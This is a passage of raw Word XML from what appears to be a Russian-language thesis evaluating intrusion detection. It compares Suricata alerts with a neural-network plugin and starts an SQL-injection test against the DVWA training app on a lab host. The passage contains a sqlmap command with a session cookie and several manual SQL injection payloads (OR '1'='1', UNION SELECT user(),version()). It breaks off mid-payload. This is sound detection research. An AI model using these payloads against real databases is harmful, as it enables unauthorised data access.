          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>detection_filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. При достижении порога 50 SYN-пакетов в секунду с одного источника система сформировала 124 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерта</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с сообщением "ET DOS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>", что значительно удобнее для анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA07DB"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331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 124 срабатывания, нейросетевой плагин — 20 292 срабатывания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C3A44" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00573718" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2804350C" w14:textId="4CB03DAE" w:rsidR="008E0171" w:rsidRPr="00DD2F4C" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.4 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тест</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инъекция</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473C7E1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-инъекция является одной из наиболее распространённых уязвимостей веб-приложений, позволяющей злоумышленнику выполнять произвольные запросы к базе данных. Для автоматизированного тестирования использовался инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302038C0" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C7D742" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>://192.168.0.104/</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/?</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=1&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599D49F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHPSESSID=8p2hks14jrouo88s3puve881g7; security=low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EA2D7" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E61117A" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A39EC19" w14:textId="71913F35" w:rsidR="008E0171" w:rsidRPr="00573718" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс обнаружения показан на рисунке 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B233454" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00573718" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509B4BAA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00837241" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4E5905" wp14:editId="5D12D969">
            <wp:extent cx="5600700" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112555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5326" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect r="-525" b="47025"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5616386" cy="2215989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DFC02" w14:textId="2A4F0799" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>QL-инъекции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F89A1EF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00244ABF" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Дополнительно проводилось ручное тестирование через браузер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на атакующей машине</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имитация действий злоумышленника без использования автоматизированных инструментов. В поле User ID модуля SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-приложения DVWA последовательно вводились следующие строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘ ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1' OR '1'='1'#, 1' UNION SELECT 1,2#, 1' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
